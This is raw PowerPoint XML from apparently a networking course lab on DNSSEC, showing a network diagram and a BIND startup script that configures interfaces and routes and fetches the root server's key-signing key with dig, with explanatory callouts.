        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="114646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210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76354844-05C6-A7BB-9734-C274A4E2F77D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9336E7E-1FE7-739A-2668-691A9DD0CFEC}"/>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eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24035B1-9061-D5FC-2CC0-04939D8EED7B}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91602DE5-C189-FB3D-F2D4-D8F7B566C0D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="118746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28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDA023A-FAF1-5FB8-B2EF-49584635800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>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D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10AD365-40B7-8162-5984-B6808E8D0CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069"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192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479CE0AD-02E2-CEEE-5F27-5ADC480F53C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069EEDD3-BD86-A3D7-4E7A-82F9FCDA8370}"/>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23" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7012061B-D8BC-1ACC-5402-0999D97BBFE5}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60FB68F-E3C9-3223-C5AD-51DB1CDF44DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEA10D3-BADE-EE86-757C-F320DBEB77E0}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{421C04C3-4FF1-D604-60B8-F09B9B89A0D4}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603947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AD8F2-CDD0-502C-020B-36B88C8F90A1}"/>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C713534F-9DA4-50CB-6F5D-F8052AF579E9}"/>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C14DE5A1-3A5D-A317-CBDB-888E0FF50B17}"/>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5D34DA9C-8667-02AD-B3A1-FF1CFBA12C04}"/>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975EC5AE-EC9B-75AB-4CE6-F954062D5F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA7AC2-D891-B132-84CF-A1B9DD7D7327}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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200.1.1.10/24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link set dev eth0 address 00:00:00:00:0b:10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192.168.100.10/24 dev eth1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link set dev eth1 address 00:00:00:00:0d:10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130.100.0.10/24 dev eth2</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link set dev eth2 address 00:00:00:00:02:10</a:t>
              </a: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100.0.75.0/24 via 130.100.0.1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default via 200.1.1.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a: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 /var/cache/bind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770 /var/cache/bind</a:t>
              </a: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    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    ...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FB2741-0F66-7FB7-6CE2-F3A46B7E7AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73235C6F-DC10-B7E6-F127-4CB01064C634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7895099" y="2997163"/>
            <a:ext cx="3470176" cy="685106"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68278"/>
              <a:gd name="adj2" fmla="val 91956"/>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create a file called trusted-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with empty content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE07525-B36E-83C3-C088-0542B9042E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8073229" y="4110871"/>
            <a:ext cx="3830316" cy="954831"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97007"/>
              <a:gd name="adj2" fmla="val -30201"/>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create the folder where BIND usually manages cryptographic keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988425FD-DC6E-12C5-A56A-523C45B429DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5469952" y="5237801"/>
            <a:ext cx="3470176" cy="685106"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79571"/>
              <a:gd name="adj2" fmla="val -15244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change the "owner" of these folders to the bind user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="450260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E70E2-78B4-FFD6-E303-3CAE71370A86}"/>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5FAE7B3E-487F-64AD-805B-00B25E4F557A}"/>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66818E3E-4120-09BC-6E02-B6A807C5562A}"/>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A4DB942A-0156-B286-016F-EF53BB75A0FB}"/>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1A4A007B-6627-8494-61B5-24C830CF2E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDCB0247-CDDF-AD79-5F74-06CD23F1CCFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a: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 /var/cache/bind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770 /var/cache/bind</a:t>
              </a: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    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        sleep 2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    RECORD=$(dig @10.0.3.5 . DNSKEY | grep "257 3 13" | head -n 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    F=$(echo $RECORD | awk '{print $5}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    P=$(echo $RECORD | awk '{print $6}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    A=$(echo $RECORD | awk '{print $7}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    K=$(echo $RECORD | awk '{$1=$2=$3=$4=$5=$6=$7=""; print $0}' | tr -d '[:space:]’) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    ...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94486DAB-61CB-A230-8389-84859D65B49F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D29E4B-17A9-8BA6-6311-D9571A41E408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8577239" y="1691964"/>
            <a:ext cx="3470176" cy="1602929"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66225"/>
              <a:gd name="adj2" fmla="val 7639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queries the Root server (10.0.3.5) for its public keys. It specifically looks for the KSK (257) key which uses the ECDSA P-256 (13) algorithm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB8B7A5-3642-DD27-4F2A-668042C2E3BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="4827497"/>
            <a:ext cx="3830316" cy="954831"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35930"/>
              <a:gd name="adj2" fmla="val -7995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once the key is found, it saves it in its entirety inside the RECORD variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2646439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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD5E7CA-9C58-48AA-323F-707E13B95CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>content of the lab without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7CF4D6-80FD-46D2-8790-7B9D18C6C768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
